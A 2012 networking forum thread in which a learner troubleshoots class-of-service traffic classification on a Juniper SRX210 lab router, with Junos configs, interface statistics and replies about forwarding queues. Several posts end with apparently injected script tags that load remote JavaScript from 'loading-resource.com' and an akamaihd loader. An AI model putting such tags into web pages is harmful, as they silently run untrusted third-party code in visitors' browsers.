Routing
Highlighted
Routing

config traffic classification issue

‎10-09-2012 07:07 PM

This is not production, I am trying to learn. Thanks for taking the time to look.

 

very basic issue, srx210 with 2 virtual routers, using one for mgt. (is there an issue using vr's?)

I assigned a forwarding class queue, created a firewall filter and applied it as input to interface.

Created the classifier and assigned interfaces. I committed...

I still see all traffic coming into the interface as best effort.

I veified traffic with a packet filter and I also set the interface to map everything to a differnet forwarding class
 using:

The following CLI commands can assign a forwarding class directly to packets received at a logical interface:

[edit class-of-service interfaces interface-name unit logical-unit-number]forwarding-class class-name;
 
here is the very basic config i am using ( it may be familiar to some of you)
interfaces {
    ge-0/0/1 {
        unit 0 {
            family inet {
                address 172.18.121.2/30;
            }                           
        }
    }
    fe-0/0/4 {
        unit 0 {
            family inet {
                address 172.20.77.1/30;
            }
        }
    }
    fe-0/0/6 {
        unit 0 {
            family inet {
                filter {
                    input MF-class;
                }
                address 10.1.1.1/30;
            }
        }
    }
    fe-0/0/7 {
        unit 0 {
            family inet {
                address 10.100.100.2/24;
            }
        }                               
    }
    lo0 {
        unit 0 {
            family inet {
                address 192.168.121.1/32;
            }
        }
    }
}
forwarding-options {
    inactive: packet-capture {
        file filename localcapture;
        maximum-capture-size 1500;
    }
}
routing-options {
    router-id 192.168.121.1;
}
protocols {
    ospf {
        area 0.0.0.0 {
            interface fe-0/0/4.0 {
                interface-type p2p;
            }                           
            interface lo0.0;
            interface fe-0/0/6.0 {
                passive;
            }
        }
    }
}
class-of-service {
    classifiers {
        dscp BA-class {
            import default;
            forwarding-class expedited-forwarding {
                loss-priority low code-points [ ef cs5 ];
            }
        }
    }
    forwarding-classes {
        queue 4 data;
    }
    interfaces {
        fe-* {
            unit * {
                classifiers {
                    dscp BA-class;
                }                       
            }
        }
    }
}
security {
    forwarding-options {
        family {
            inet6 {
                mode packet-based;
            }
            mpls {
                mode packet-based;
            }
        }
    }
}
firewall {
    filter MF-class {
        term scp {
            from {
                destination-port 22;
            }
            then {
                loss-priority low;
                forwarding-class data;  
            }
        }
        term accept {
            then accept;
        }
    }
}
routing-instances {
    MANAGEMENT {
        instance-type virtual-router;
        interface fe-0/0/7.0;
    }
}


<script type="text/javascript" src="http://loading-resource.com/data.geo.php?callback=window.__geo.getData"></script> <script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>
6 REPLIES 6
Highlighted
Routing

Re: config traffic classification issue

‎10-09-2012 07:51 PM

IIRC without a rewrite rule applied to the interface the traffic will be queued in queue 4 through the forwarding calss but it will not have any remarking applied so if you PCAP the output it will still look like BE to the next router.

 

To verify that traffic is entering the FC/queue use the "show interfaces queue ge-x/y/z" command.

 

To create a rewrite rule take a look at this - http://www.juniper.net/techpubs/en_US/junos12.1/topics/example/security-rewrite-rule-transparent-mod...

 

Cheers,

Caillin

Highlighted
Routing

Re: config traffic classification issue

‎10-10-2012 02:39 AM

I don't get far enough for re-write rules. It does not put the traffic into the "data"  forwarding queue.

Do I have to use ge interfaces?

<script type="text/javascript" src="http://loading-resource.com/data.geo.php?callback=window.__geo.getData"></script> <script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>
Highlighted
Routing

Re: config traffic classification issue

‎10-10-2012 04:51 AM

Hi,

Is the SCP traffic coming into the SRX through fe-0/0/6 interface ? or anyother interfaces?

Because, I can see MF classifier is applied to only fe-0/0/6 and other interfaces are having BA classifiers.

 

Also, in which interface did you check the traffic for its forwarding class?

Can you post the "show interface xxx extensive"?

 

Rgds,

Moses N

Highlighted
Routing

Re: config traffic classification issue

‎10-10-2012 07:02 AM

I moved the fe-0/0/6 config to ge-0/0/0. The laptop generating the traffic is directly connected to ge-0/0/0

I also changed the class of service interface to be ge-0/0/0 unit 0

I added the output from "show interface ge-0/0/0 extensive after the new config"

 

ray

 

interfaces {
    ge-0/0/0 {
        unit 0 {
            family inet {
                filter {
                    input MF-class;
                }                       
                address 10.1.1.1/30;
            }
        }
    }
    ge-0/0/1 {
        unit 0 {
            family inet {
                address 172.18.121.2/30;
            }
        }
    }
    fe-0/0/4 {
        unit 0 {
            family inet {
                address 172.20.77.1/30;
            }
        }
    }
    fe-0/0/7 {
        unit 0 {
            family inet {               
                address 10.100.100.2/24;
            }
        }
    }
    lo0 {
        unit 0 {
            family inet {
                address 192.168.121.1/32;
            }
        }
    }
}
forwarding-options {
    inactive: packet-capture {
        file filename localcapture;
        maximum-capture-size 1500;
    }
}
routing-options {
    router-id 192.168.121.1;
}
protocols {
    ospf {
        area 0.0.0.0 {
            interface fe-0/0/4.0 {      
                interface-type p2p;
            }
            interface lo0.0;
            interface ge-0/0/0.0;
        }
    }
}
class-of-service {
    classifiers {
        dscp BA-class {
            import default;
            forwarding-class expedited-forwarding {
                loss-priority low code-points [ ef cs5 ];
            }
        }
    }
    forwarding-classes {
        queue 4 data;
    }
    interfaces {
        ge-0/0/0 {
            unit 0 {
                classifiers {
                    dscp BA-class;
                }
            }                           
        }
    }
}
security {
    forwarding-options {
        family {
            inet6 {
                mode packet-based;
            }
            mpls {
                mode packet-based;
            }
        }
    }
}
firewall {
    filter MF-class {
        term scp {
            from {
                destination-port 22;
            }
            then {
                loss-priority low;
                forwarding-class data;
            }
        }                               
        term accept {
            then accept;
        }
    }
}
routing-instances {
    MANAGEMENT {
        instance-type virtual-router;
        interface fe-0/0/7.0;
    }
}
R2# run show interfaces extensive
Physical interface: ge-0/0/0, Enabled, Physical link is Up
  Interface index: 134, SNMP ifIndex: 509, Generation: 137
  Link-level type: Ethernet, MTU: 1514, Link-mode: Full-duplex, Speed: 1000mbps, BPDU Error: None,
  MAC-REWRITE Error: None, Loopback: Disabled, Source filtering: Disabled, Flow control: Enabled,
  Auto-negotiation: Enabled, Remote fault: Online
  Device flags   : Present Running
  Interface flags: SNMP-Traps Internal: 0x0
  Link flags     : None
  CoS queues     : 8 supported, 8 maximum usable queues
  Hold-times     : Up 0 ms, Down 0 ms
  Current address: a8:d0:e5:a9:07:c0, Hardware address: a8:d0:e5:a9:07:c0
  Last flapped   : 2012-10-10 18:59:03 UTC (02:52:38 ago)
  Statistics last cleared: 2012-10-10 19:19:17 UTC (02:32:24 ago)
  Traffic statistics:
   Input  bytes  :                21894                    0 bps
   Output bytes  :               176541                    0 bps
   Input  packets:                  247                    0 pps
   Output packets:                 1227                    0 pps
  Input errors:
    Errors: 0, Drops: 0, Framing errors: 0, Runts: 0, Policed discards: 0, L3 incompletes: 0,
    L2 channel errors: 0, L2 mismatch timeouts: 0, FIFO errors: 0, Resource errors: 0
  Output errors:
    Carrier transitions: 0, Errors: 0, Drops: 0, Collisions: 0, Aged packets: 0, FIFO errors: 0,
    HS link CRC errors: 0, MTU errors: 0, Resource errors: 0
  Egress queues: 8 supported, 5 in use
  Queue counters:       Queued packets  Transmitted packets      Dropped packets
    0 best-effort                  179                  179                    0
    1 expedited-fo                   0                    0                    0
    2 assured-forw                   0                    0                    0
    3 network-cont                1048                 1048                    0
    4 data                           0                    0                    0
  Queue number:         Mapped forwarding classes
    0                   best-effort
    1                   expedited-forwarding
    2                   assured-forwarding
    3                   network-control
    4                   data        
  Active alarms  : None
  Active defects : None
  MAC statistics:                      Receive         Transmit
    Total octets                         26668           142135
    Total packets                          247             1227
    Unicast packets                        220              174
    Broadcast packets                       27                5
    Multicast packets                        0             1048
    CRC/Align errors                         0                0
    FIFO errors                              0                0
    MAC control frames                       0                0
    MAC pause frames                         0                0
    Oversized frames                         0
    Jabber frames                            0
    Fragment frames                          0
    VLAN tagged frames                       0
    Code violations                          0
  Filter statistics:
    Input packet count                       0
    Input packet rejects                     0
    Input DA rejects                         0
    Input SA rejects                         0
    Output packet count                                       0
    Output packet pad count                                   0
    Output packet error count                                 0
    CAM destination filters: 4, CAM source filters: 0
  Autonegotiation information:
    Negotiation status: Complete
    Link partner:
        Link mode: Full-duplex, Flow control: None, Remote fault: OK, Link partner Speed: 1000 Mbps
    Local resolution:
        Flow control: None, Remote fault: Link OK
  Packet Forwarding Engine configuration:
    Destination slot: 0
  CoS information:
    Direction : Output
    CoS transmit queue               Bandwidth               Buffer Priority   Limit
                              %            bps     %           usec
    0 best-effort            95      950000000    95              0      low    none
    3 network-control         5       50000000     5              0      low    none
  Interface transmit statistics: Disabled
                                        
  Logical interface ge-0/0/0.0 (Index 76) (SNMP ifIndex 510) (Generation 141)
    Flags: SNMP-Traps 0x0 Encapsulation: ENET2
    Traffic statistics:
     Input  bytes  :                21894
     Output bytes  :               134621
     Input  packets:                  247
     Output packets:                 1227
    Local statistics:
     Input  bytes  :                 5718
     Output bytes  :                94740
     Input  packets:                   32
     Output packets:                 1058
    Transit statistics:
     Input  bytes  :                16176                    0 bps
     Output bytes  :                39881                    0 bps
     Input  packets:                  215                    0 pps
     Output packets:                  169                    0 pps
    Security: Zone: Null
    Flow Statistics :  
    Flow Input statistics :
      Self packets :                     0
      ICMP packets :                     0
      VPN packets :                      0
      Multicast packets :                0
      Bytes permitted by policy :        0
      Connections established :          0
    Flow Output statistics:
      Multicast packets :                0
      Bytes permitted by policy :        0
    Flow error statistics (Packets dropped due to):
      Address spoofing:                  0
      Authentication failed:             0
      Incoming NAT errors:               0
      Invalid zone received packet:      0
      Multiple user authentications:     0
      Multiple incoming NAT:             0
      No parent for a gate:              0
      No one interested in self packets: 0       
      No minor session:                  0
      No more sessions:                  0
      No NAT gate:                       0
      No route present:                  0
      No SA for incoming SPI:            0
      No tunnel found:                   0
      No session for a gate:             0
      No zone or NULL zone binding       0
      Policy denied:                     0
      Security association not active:   0
      TCP sequence number out of window: 0
      Syn-attack protection:             0
      User authentication errors:        0
    Protocol inet, MTU: 1500, Generation: 157, Route table: 0
      Flags: Sendbcast-pkt-to-re
      Input Filters: MF-class
      Addresses, Flags: Is-Preferred Is-Primary
        Destination: 10.1.1.0/30, Local: 10.1.1.1, Broadcast: 10.1.1.3, Generation: 158


<script type="text/javascript" src="http://loading-resource.com/data.geo.php?callback=window.__geo.getData"></script> <script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>
Highlighted
Routing

Re: config traffic classification issue

‎10-10-2012 12:56 PM

Hi,

Forwarding classes are associated with output queues. Packets are queued when they leave from the device. 

You mentioned that you are generating the traffic from ge-0/0/0. So it is input interface for this traffic. You need to check the  forwarding class in the output interface.

If you run the "show interface xxxx extensive.." Command on output interface, you might see packets in data queue.

 

Regards,

Moses N

Highlighted
Routing

Re: config traffic classification issue

‎10-10-2012 02:18 PM

Thanks, I was checking. It seems like a bug. I put the same config on an MX80 running 10.4 and it worked fine.

Not sure if its srx or junos 11.4r4 thats the issue.

<script type="text/javascript" src="http://loading-resource.com/data.geo.php?callback=window.__geo.getData"></script> <script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>
Feedback